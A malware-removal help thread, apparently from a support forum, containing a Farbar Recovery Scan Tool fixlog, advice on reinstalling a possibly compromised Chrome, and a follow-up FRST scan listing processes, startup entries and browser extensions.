"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{587A092A-9420-4320-9DDC-513DB0956BC2}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{3F8E71DB-3CB9-46B0-9EEC-7E5BBF163810}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{F323F12D-3EEC-4458-B055-FBAD54D42779}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{3F67B498-C298-4567-8384-9D4AE7900D1F}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{39A83BDE-1430-4A5B-8585-D464B7D8D881}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{9965AD37-C5DF-45BB-A1C2-549EA064C54F}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{B8A59D96-BE63-4FC8-A092-04A578AB2D75}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{FCAB66D8-96FF-4F4B-A106-15A490C11107}C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{C180034F-D109-4AFE-8F36-F09BB28A0030}C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{F03F74C6-9B28-4C5E-807F-CFFCE0C2E487}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{5BAFDC52-58EF-4B5B-A341-46B75F445987}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{D5FA44F3-6E70-484A-B950-51C23F63C442}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{798BE548-E73F-4AF0-94AC-9E161FCF481B}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{B5F6D4BD-ADF9-4442-A0DC-0243CA6C4944}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{6B7EAF84-2E3E-4E50-BA29-83BCA3A5D636}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{53056AED-CF0C-4B77-BE51-E7320F566EF1}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{99F55921-8B24-4D45-9447-4B1DC03D0F8F}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{926B5B97-5586-42AD-A783-764467766E9E}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{C1F252D6-9E31-4C1C-92CA-5144E45CBD5F}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{3982D1B5-9BA8-4969-BF52-16243FA460F3}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{6F63DBCC-4ACC-457F-93AE-3F8F539D5481}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{38634E52-E26E-4827-B65C-6FD60DEEFCC1}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{B8B2B85F-89FA-41D1-84C9-AD725179C6CF}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{68A8AE5E-4C4A-41A3-9B22-62A04FA9BE31}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{221BFC9C-CC6F-4FE4-B04E-F71FA6660C03}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{2443D1D6-CC7F-4A8D-8467-39EE257F12AF}" => not found
"C:\Program Files (x86)\IncrediMail" => not found
C:\Users\#Strazzo.RoseGold##\AppData\Local\Temp\csrss => moved successfully
C:\Program Files (x86)\UCBrowser => moved successfully
C:\Windows\System32\drivers\WinmonFS.sys => moved successfully
C:\Windows\System32\drivers\Winmon.sys => moved successfully
Could not move "C:\Windows\2CCD359FD649.sys" => Scheduled to move on reboot.
"C:\Users\Stanley\AppData\Roaming\EpicNet Inc" => not found
"C:\Windows\rss\csrss.exe" => not found
"C:\Windows\windefender.exe" => not found
"C:\Users\Stanley\AppData\Roaming\EpicNet Inc" => not found
C:\Users\RoseGold\AppData\Local\Temp\syncios.exe => moved successfully
C:\Users\RoseGold\AppData\Local\Temp\SynciosDeviceService.exe => moved successfully
C:\Users\Stanley\AppData\Local\Temp\syncios.exe => moved successfully
C:\Users\Stanley\AppData\Local\Temp\SynciosDeviceService.exe => moved successfully

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 136055492 B
Java, Flash, Steam htmlcache => 1043 B
Windows/system/drivers => 30584 B
Edge => 0 B
Chrome => 2285654920 B
Firefox => 115633553 B
Opera => 104112666 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 249204 B
systemprofile32 => 128 B
LocalService => 8428 B
NetworkService => 219514 B
Stanley => 302640661 B
RoseGold => 133325 B
Administrator => 129509 B

RecycleBin => 75887717 B
EmptyTemp: => 2.8 GB temporary data Removed.

================================

Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 15-02-2019 00:07:15)

C:\Windows\2CCD359FD649.sys => Could not move

==== End of Fixlog 00:07:16 ====

Link to post
Share on other sites

Your copy of Chrome has probably been compromised

step1.gif Remove Chrome from your Computer and reinstall a fresh copy later.

step2.gifIf you remove the syncing of your account you must remove it before you save your bookmarks etc...
Delete Your Google Chrome Browser Sync Data if you sync with other devices. <- Important ...
https://forums.malwarebytes.com/topic/214325-chrome-secure-preferences-detection-always-comes-back/

step3.gif Before you remove Chrome Export your Bookmarks
Chrome will export your bookmarks as a HTML file, which you can then import into another browser.
How To: http://ccm.net/faq/31791-how-to-backup-your-google-chrome-bookmarks

step4.gif Before you remove Chrome Export your Passwords
How to export your saved passwords from Chrome
https://betanews.com/2018/03/09/export-chrome-passwords/

step5.gif Clear your Chrome cache and cookies
https://support.google.com/chromebook/answer/183083?hl=en

step6.gif Remove Chrome using the the instructions on this page.
https://support.google.com/chrome/answer/95319?hl=en

step7.gif Re-install Chrome and the Bookmarks.
<<<>>>

How is it now?

Link to post
Share on other sites

    FRST.TXT

 

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 13.02.2019
Ran by #Strazzo.RoseGold## (administrator) on STRAZZOWEEZY (17-02-2019 12:44:19)
Running from C:\Users\Stanley\Downloads\FRST
Loaded Profiles: #Strazzo.RoseGold## (Available Profiles: #Strazzo.RoseGold## & RoseGold & Administrator)
Platform: Windows 8.1 Enterprise (Update) (X64) Language: English (United States)
Default browser: IE
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(LSI Corporation) C:\Program Files\LSI SoftModem\agr64svc.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\HPDrvMntSvc.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Hotkey Support\HPHotkeyMonitor.exe
(HP Inc.) C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe
(Iskysoft) C:\Program Files (x86)\iSkysoft\IAF\2.4.2.223\IsAppService.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
( ) C:\Program Files\OpenVPN\bin\openvpnserv2.exe
(The OpenVPN Project) C:\Program Files\OpenVPN\bin\openvpnserv.exe
(The OpenVPN Project) C:\Program Files\OpenVPN\bin\openvpn.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\mDNSResponder.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(BlackBerry Limited) C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\tunmgr.exe
(The OpenVPN Project) C:\Program Files\OpenVPN\bin\openvpn.exe
(The OpenVPN Project) C:\Program Files\OpenVPN\bin\openvpn.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(BlackBerry Limited) C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\BbDevMgr.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
(BitTorrent Inc.) C:\Users\Stanley\AppData\Roaming\uTorrent\uTorrent.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IDMan.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudPhotos.exe
(Microsoft Corporation) C:\Windows\System32\StikyNot.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe
(BitTorrent Inc.) C:\Users\Stanley\AppData\Roaming\uTorrent\updates\3.5.5_44994\utorrentie.exe
(Apple, Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\secd.exe
(BitTorrent Inc.) C:\Users\Stanley\AppData\Roaming\uTorrent\updates\3.5.5_44994\utorrentie.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.23\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.23\GoogleCrashHandler64.exe
(HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16.0.3327.1048_x64__8wekyb3d8bbwe\onenoteim.exe
(Microsoft Corporation) C:\Windows\System32\UserAccountBroker.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(VideoLAN) C:\Program Files\VideoLAN\VLC\vlc.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\AppleIEDAV.exe
(Microsoft Corporation) C:\Windows\System32\prevhost.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [302904 2019-01-18] (Apple Inc. -> Apple Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [Skype for Desktop] => C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [53540200 2019-02-08] (Skype Software Sarl -> Skype Technologies S.A.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [OPENVPN-GUI] => C:\Program Files\OpenVPN\bin\openvpn-gui.exe [672384 2018-04-26] (OpenVPN Technologies, Inc. -> )
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [uTorrent] => C:\Users\Stanley\AppData\Roaming\uTorrent\uTorrent.exe [1908920 2019-01-17] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [3907152 2015-07-07] (Tonec Inc. -> Tonec Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [RIMDeviceManager] => C:\Program Files (x86)\Common Files\Research In Motion\RIMDeviceManager\RIMDeviceManager.exe [2471672 2015-05-20] (BlackBerry Ltd. -> Research In Motion Limited)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [67384 2018-12-03] (Apple Inc. -> Apple Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [AppleIEDAV] => C:\Program Files (x86)\Common Files\Apple\Internet Services\AppleIEDAV.exe [68408 2018-12-03] (Apple Inc. -> Apple Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [iCloudDrive] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe [110392 2018-12-03] (Apple Inc. -> Apple Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [ApplePhotoStreams] => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [67896 2019-01-15] (Apple Inc. -> Apple Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [iCloudPhotos] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudPhotos.exe [356664 2018-12-03] (Apple Inc. -> Apple Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [RESTART_STICKY_NOTES] => C:\Windows\System32\StikyNot.exe [479744 2014-11-22] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\MountPoints2: {2c5e9d22-76c0-11e8-825e-402cf4d8539a} - "C:\Windows\system32\RunDLL32.EXE" Shell32.DLL,ShellExec_RunDLL E:\start.exe
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\MountPoints2: {82ed0bf7-c8c3-11e8-8261-402cf4d8539a} - "E:\AutoRun.exe" 
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\MountPoints2: {82ed0c50-c8c3-11e8-8261-402cf4d8539a} - "E:\AutoRun.exe" 
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\MountPoints2: {82ed0d35-c8c3-11e8-8261-402cf4d8539a} - "E:\AutoRun.exe" 
HKU\S-1-5-18\...\Policies\Explorer: [LinkResolveIgnoreLinkInfo] 1
HKU\S-1-5-18\...\Policies\Explorer: [NoResolveSearch] 1
HKU\S-1-5-18\...\Policies\Explorer: [NoInternetOpenWith] 1
HKLM\...\Drivers32-x32: [msacm.iac2] => C:\Windows\SysWOW64\iac25_32.ax [197632 2013-08-22] (Intel Corporation)
HKLM\...\Drivers32-x32: [VIDC.GEOS] => C:\Windows\SysWOW64\GeoCodecD.dll [622592 2010-10-11] (GeoVision)
HKLM\Software\Microsoft\Active Setup\Installed Components: [OpenVPN_UserSetup] -> reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OPENVPN-GUI /t REG_SZ /d "C:\Program Files\OpenVPN\bin\openvpn-gui.exe" /f
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.109\Installer\chrmstp.exe [2019-02-15] (Google LLC -> Google Inc.)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{65122CB0-EA0F-47DF-A953-017170ED12F9}] -> "C:\Program Files (x86)\UCBrowser\Application\7.0.185.1002\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --wow-install-target-path="C:\Program Files (x86)\UCBrowser"
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{73FA19D0-2D75-11D2-995D-00C04F98BBC9}] -> 
GroupPolicy: Restriction ? <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.8.1
Tcpip\..\Interfaces\{25D62E88-57F7-4879-91B3-0FBE5C8B4F71}: [DhcpNameServer] 1.1.1.1 1.0.0.1
Tcpip\..\Interfaces\{8BF038DF-16AA-4203-90BE-740E3461F3D4}: [DhcpNameServer] 192.168.8.1
Tcpip\..\Interfaces\{D14C4B82-5B48-498C-8F6E-81ADA12C1C8C}: [DhcpNameServer] 172.20.10.1
Tcpip\..\Interfaces\{D433F076-2F7D-4301-BE73-E8CE381871C0}: [DhcpNameServer] 192.168.8.1

Internet Explorer:
==================
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp
SearchScopes: HKLM-x32 -> DefaultScope value is missing
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2015-07-08] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2015-07-08] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
IE Session Restore: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001 -> is enabled.

FireFox:
========
FF ProfilePath: C:\Users\Stanley\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default [2019-02-15]
FF Extension: (Google Code Correction) - C:\Users\Stanley\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default\features\{5b8c6255-56bd-4974-a055-17773a870acc}\google-code-correction@mozilla.org.xpi [2018-05-21] [Legacy]
FF HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Firefox\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc7
FF Extension: (IDM integration) - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc7 [2018-09-23] [Legacy] [not signed]
FF HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc5 [2019-02-16] [Legacy] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_286.dll [2016-01-19] ()
FF Plugin: @videolan.org/vlc,version=3.0.3 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_286.dll [2016-01-19] ()
FF Plugin-x32: @RIM.com/WebSLLauncher,version=1.0 -> C:\Program Files (x86)\Common Files\Research In Motion\BBWebSLLauncher\NPWebSLLauncher.dll [2015-05-22] ()
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2018-12-17] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2018-12-17] (Google Inc.)

Chrome: 
=======
CHR DefaultProfile: Profile 3
CHR Session Restore: Profile 3 -> is enabled.
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default [2019-02-15]
CHR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08]
CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2018-06-15]
CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2018-11-08]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-12]
CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-11-08]
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default [2019-02-17]
CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-02-15]
CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-02-15]
CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-02-15]
CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-02-15]
CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-02-15]
CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2019-02-16]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-02-15]
CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-02-15]
CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-15]
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1 [2019-02-17]
CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-05-04]
CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2018-05-04]
CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-23]
CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-05-04]
CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-05-04]
CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-26]
CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2019-01-10]
CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-02-16]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-05-04]
CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-05-04]
CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-16]
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2 [2019-02-17]
CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-06-07]
CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aohghmighlieiainnegkcijnfilokake [2018-06-07]
CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-27]
CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-06-07]
CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-06-07]
CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-25]
CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2019-01-16]
CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-02-16]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-07]
CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-06-07]
CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-16]
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3 [2019-02-17]
CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-06-07]
CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\aohghmighlieiainnegkcijnfilokake [2018-06-07]
CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-06-07]
CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-06-07]
CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-06-07]
CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-09-06]
CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2019-01-10]
